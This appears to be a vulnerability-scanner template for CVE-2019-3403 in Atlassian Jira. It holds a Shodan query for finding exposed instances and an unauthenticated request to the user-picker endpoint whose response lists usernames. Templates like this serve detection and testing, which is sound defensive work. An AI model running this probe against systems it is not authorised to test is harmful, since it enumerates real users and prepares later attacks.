id: CVE-2019-3403

info:
  name: User enumeration via an incorrect authorisation check
  author: Ganofins
  severity: medium
  description: The /rest/api/2/user/picker rest resource in Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to enumerate usernames
    via an incorrect authorisation check.
  reference:
    - https://jira.atlassian.com/browse/JRASERVER-69242
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-3403
    cwe-id: CWE-863
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,atlassian,jira,enumeration

requests:
  - method: GET
    path:
      - "{{BaseURL}}/rest/api/2/user/picker?query="

    matchers-condition: and
    matchers:

      - type: word
        words:
          - '"users":'
          - '"total":'
          - '"header":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200